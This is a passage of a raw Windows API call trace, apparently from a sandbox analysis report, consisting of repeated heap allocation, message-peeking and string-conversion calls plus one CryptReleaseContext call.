(HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0087.667] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0087.667] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0087.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0087.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.667] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0087.668] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0087.668] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0087.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0087.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.668] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.668] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9700 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9820 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9778 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9850 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0087.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa96b8 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa99a0 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ad8 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74598 [0087.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b50 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9af0 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.669] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0087.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0087.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0087.669] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0087.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.670] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0087.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0087.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0087.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0087.670] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0087.670] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0087.671] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0087.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0087.671] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0087.671] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0087.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0087.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.671] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0087.671] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0087.671] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0087.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9700 [0087.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0087.671] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0087.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0087.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0087.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0087.671] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.671] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0087.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0087.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.672] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.672] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.672] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0087.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0087.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0087.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0087.672] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0087.672] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0087.672] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0087.672] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0087.672] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.672] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.672] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0087.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7140, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0087.673] CryptReleaseContext (hProv=0x9961a8, dwFlags=0x0) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9700 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9850 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9820 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96b8 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0087.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0087.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0087.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0087.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0087.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74958 | out: hHeap=0x2af0000) returned 1 [0087.674] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0087.674] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0087.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0087.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0087.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0087.674] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0087.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0087.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0087.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0087.674] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0087.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0087.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0087.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0087.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0087.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.674] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0087.674] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0087.675] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0087.675] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0087.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0087.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0087.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0087.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0087.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0087.675] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0087.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0087.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0087.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0087.675] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0087.675] 